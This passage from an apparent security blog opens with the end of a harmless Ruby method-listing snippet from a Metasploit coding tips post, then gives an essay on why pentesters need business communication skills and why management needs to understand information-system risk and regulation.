    (methods - Object.instance_methods).sort
  end
end 

Now there is nothing left to do but start coding and testing. I hope you find these tips useful in your adventures coding for Metasploit in Ruby.

Teaching Old Dogs New Tricks: Why Both Pentesters and Business Management Must Adapt

During the podcasters meetup at Shmoocon 2010 a very important subject came up for discussion: many pentesters do not know how business people think or how to talk with them, and I have to say I fully agree with that notion. A great number of discussions in forums, IRC channels, blogs, and podcasts place the blame for many of the insecurities in companies today entirely on the business management side, and I personally do not agree with this. The fault is a shared one. Both sides are at fault, and both sides need to change their training and the way they approach their jobs.

 

Again and again we see pentesters complain that they presented to their client's management the vulnerabilities, shells, and information they were able to obtain on the target network, and management did not understand or simply dismissed what they said, causing no change in the client's environment. For me this statement raises several questions. Do we as a community encourage pentesters to acquire, in addition to the technical body of knowledge they must master, soft skills in report writing, public speaking, project management, risk analysis, and basic business logic? Do we require that management and business people understand how information systems operate, the risks these systems are exposed to, and how those risks may impact their business operations? They learn about accounting, markets, trends, and many other areas, but the focus given to information systems is a low one.

 

The skills mentioned above are ones pentesters need to acquire, but for most of us this type of training is like pulling teeth: we hate it, but if the tooth is rotten it must be removed. Mastery of a field does not come from practicing what we already know again and again, but from training and practicing deliberately on what we are not good at and must master. We also talk a lot about the process we follow while attacking a client's systems during a pentest, or what we must do during a code review, vulnerability assessment, or incident response, but in the end we are consultants providing a service the client needs, so we must understand our client: how he does business, what he considers a risk to his business, and what he has in place to achieve his business goals. Once we know all of this, we get a pretty good picture of which systems and processes should be targeted during our work. It is also important to be very clear on what we can and cannot do, so clear ROE (Rules of Engagement) are of great importance, since they define our boundaries. We have to remember that our actions, if not controlled, can cost our clients large amounts of money and possibly image problems. While defining the ROE with the client we can get a clear look at his worries, his mindset, and his general demeanor; this is much like applying Social Engineering skills, since the concepts are similar and only the end result differs.
We also have to be honest: not all consultants have the skills to stand in front of a business person, transmit the desired message in a way the business side can understand, and give them a clear track of what they can do to improve the risk posture of their business and the value of what was found. This is one of the main reasons I like consultants to work in groups, each with their own specialty, so as to achieve the best results. The person managing the technical group and acting as mediator should be a project manager or senior consultant with both the business and technical knowledge to transmit findings and keep the team focused on what matters most to the client, which is nothing more than reducing the risks to his business and how those risks affect his bottom line. Still, anyone who wants to be a good security consultant, be it as a pentester, incident response specialist, or any other security position, must have this knowledge and know how to apply it in their work.

 

On the management side, this means knowing how information systems work, the regulations that govern their use, the best practices for their use, and how they relate to the way businesses now depend on these systems. In the new information age being connected is of great importance, but it also puts a business just a couple of milliseconds away from every script kiddie who wants to make a name for himself, and from every corporate spy, criminal organization, and curious soul out there; speed matters, but carefully managing the risks of this new way of doing business must also be taken into account. Proper training and education must be given to the new generation of business majors, and the current crop of executives must be influenced to adapt to these changes. They must see that security services, provided by external and internal entities, help minimize risk so they remain profitable and nimble enough to adapt to change. Training in laws and regulations is a must, from the domains in the CISSP to PCI, the Gramm-Leach-Bliley Act, and many others, not only those in the US but also those in Europe and other continents, so as to understand how to comply with, improve on top of, and adapt to these regulations in ways that help the business. Management frameworks and procedures for information systems such as ITIL and NIST guidance must be studied to build a base of knowledge of what it takes to administer these systems, to understand what an IT department must provide as a base for its operation, and to understand why proper budgeting for security and other risk mitigation factors is important.

 

In the end I believe that the way new business people and security consultants are trained and operate must evolve to handle not only how business, the economy, and systems have changed, but also how security is no longer some black art; it is a field with structure and a body of knowledge that makes it critical for any operation in today's market. Both sides must know how to manage risk by knowing how to transfer, eliminate, and mitigate it, and where it makes sense to do each.

 

Note: Special thanks to Chris Nickerson for the proofreading and for helping me re-express some of the ideas.